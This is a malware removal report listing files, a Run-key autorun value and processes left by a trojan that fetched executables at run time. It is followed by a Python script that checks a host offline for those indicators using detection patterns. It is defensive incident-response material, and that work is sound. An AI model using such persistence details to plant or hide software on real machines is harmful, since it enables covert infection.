%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy25.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\prepreinstaller_win[1].exe (36464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn24.tmp (47264 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn23.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1A.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\L5lD0nHnr[1].exe (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1B.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc14.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\vos[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp (10646 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\wpesEcv[1].exe (150707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1E.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1D.tmp (8472 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Bundle_OperaRUnew[1].exe (8472 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\avg18.exe (40388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\SilentInstaller_dotnet4[1].exe (152993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\setup3.exe (2420 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-IQVJP.tmp\setup3.tmp (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskE.tmp (3638 bytes)
%Program Files%\baidu\is-GBLUE.tmp (36 bytes)
%Program Files%\baidu\unins000.dat (934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-1NTQ5.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\baidu\is-KO5N5.tmp (34453 bytes)
%Program Files%\baidu\is-I042G.tmp (601 bytes)
%Program Files%\baidu\baidu.ini (65 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"apphide" = "%Program Files%\baidu\ppt.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
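The manual removal steps above double as a host-check list. The script below is an added example, not part of the Lavasoft report, that turns those indicators (the "apphide" Run value, the dropped files with their sizes, and the process image names) into checks that run offline. It assumes a mapping for the report's %Program Files%, %Documents and Settings% and %current user% placeholders, a `reg export`-style dump of the Run key, a file inventory and a process list; all of these inputs are constructed here for the example. The filename pattern for NSIS temp stubs (ns + one letter + hex + .tmp) is inferred from the names in the process list and is an assumption, not something the report states.

```python
"""Offline IOC triage for the Trojan.NSIS.StartPage removal list (added example)."""
import re
from typing import Dict, Iterable, List, Tuple

# Indicators copied from the report's manual-removal section.
AUTORUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
AUTORUN_VALUE = "apphide"
AUTORUN_DATA = r"%Program Files%\baidu\ppt.exe"

# (path as written in the report, size in bytes observed in the sandbox run)
DROPPED_FILES: List[Tuple[str, int]] = [
    (r"%Program Files%\baidu\baidu.ini", 65),
    (r"%Program Files%\baidu\unins000.dat", 934),
    (r"%Documents and Settings%\%current user%\Local Settings\Temp\avg18.exe", 40388),
    (r"%Documents and Settings%\%current user%\Local Settings\Temp\setup3.exe", 2420),
]

# Fixed image names from the process list; the ns*.tmp stubs vary per run,
# so they are matched by shape instead (assumed pattern, see lead-in).
PROCESS_NAMES = {"bind.exe", "amisid.exe", "ppt.exe", "setup3.exe", "setup3.tmp"}
NSIS_STUB = re.compile(r"^ns[a-z][0-9a-f]{1,4}\.tmp$", re.IGNORECASE)


def expand(path: str, env: Dict[str, str]) -> str:
    """Replace the report's %Name% placeholders using a host-specific mapping."""
    return re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1), m.group(0)), path)


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal parser for `reg export` output: {key path: {value name: data}}.
    Quoted (REG_SZ) data is unescaped; other value types are kept raw."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        if current is None or not line.startswith('"'):
            continue
        m = re.match(r'"((?:[^"\\]|\\.)*)"=(.*)$', line)
        if not m:
            continue
        name, data = m.group(1), m.group(2)
        if data.startswith('"') and data.endswith('"'):
            data = re.sub(r"\\(.)", r"\1", data[1:-1])  # undo \\ and \" escaping
        keys[current][name] = data
    return keys


def check_autorun(reg: Dict[str, Dict[str, str]], env: Dict[str, str]) -> List[str]:
    """Flag the Run value from the removal list; note whether its data matches."""
    findings = []
    data = reg.get(AUTORUN_KEY, {}).get(AUTORUN_VALUE)
    if data is not None:
        expected = expand(AUTORUN_DATA, env)
        verdict = "matches report" if data.lower() == expected.lower() else "data differs from report: " + data
        findings.append(f"{AUTORUN_KEY}\\{AUTORUN_VALUE} ({verdict})")
    return findings


def check_files(inventory: Dict[str, int], env: Dict[str, str]) -> Dict[str, str]:
    """Per dropped file: 'absent', 'present, size matches' or 'present, size differs'.
    Path comparison is case-insensitive, as on NTFS/FAT."""
    have = {p.lower(): size for p, size in inventory.items()}
    result = {}
    for path, size in DROPPED_FILES:
        real = expand(path, env)
        found = have.get(real.lower())
        if found is None:
            result[real] = "absent"
        elif found == size:
            result[real] = "present, size matches"
        else:
            result[real] = f"present, size differs ({found} vs {size} in report)"
    return result


def check_processes(running: Iterable[str]) -> List[str]:
    """Image names from the process list, plus anything shaped like an NSIS temp stub."""
    return sorted(n for n in running if n.lower() in PROCESS_NAMES or NSIS_STUB.match(n))


# Constructed sample inputs (a Windows XP layout; "adm" is an assumed user name).
SAMPLE_ENV = {
    "Program Files": r"C:\Program Files",
    "Documents and Settings": r"C:\Documents and Settings",
    "current user": "adm",
}
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"apphide"="C:\\Program Files\\baidu\\ppt.exe"
"""
SAMPLE_INVENTORY = {
    r"C:\Program Files\baidu\baidu.ini": 65,
    r"C:\Program Files\baidu\unins000.dat": 900,  # deliberately not the reported 934
    r"C:\Documents and Settings\adm\Local Settings\Temp\avg18.exe": 40388,
    r"C:\Documents and Settings\adm\Local Settings\Temp\harmless.txt": 12,
}
SAMPLE_PROCESSES = ["explorer.exe", "ppt.exe", "nsh1D.tmp", "svchost.exe", "Bind.exe"]


def triage(reg_text=SAMPLE_REG_EXPORT, inventory=SAMPLE_INVENTORY,
           processes=SAMPLE_PROCESSES, env=SAMPLE_ENV) -> Dict[str, object]:
    reg = parse_reg_export(reg_text)
    return {
        "autorun": check_autorun(reg, env),
        "files": check_files(inventory, env),
        "processes": check_processes(processes),
    }


if __name__ == "__main__":
    for section, result in triage().items():
        print(section, result)
```

On a real host the inputs come from `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" run.reg`, a walk of the Temp and Program Files directories, and `tasklist`. Treat a size mismatch as "inspect", not "clean": the sizes above are from one sandbox run, and several of the dropped executables were fetched from a server at run time (see the Temporary Internet Files entries), so a later download can legitimately differ.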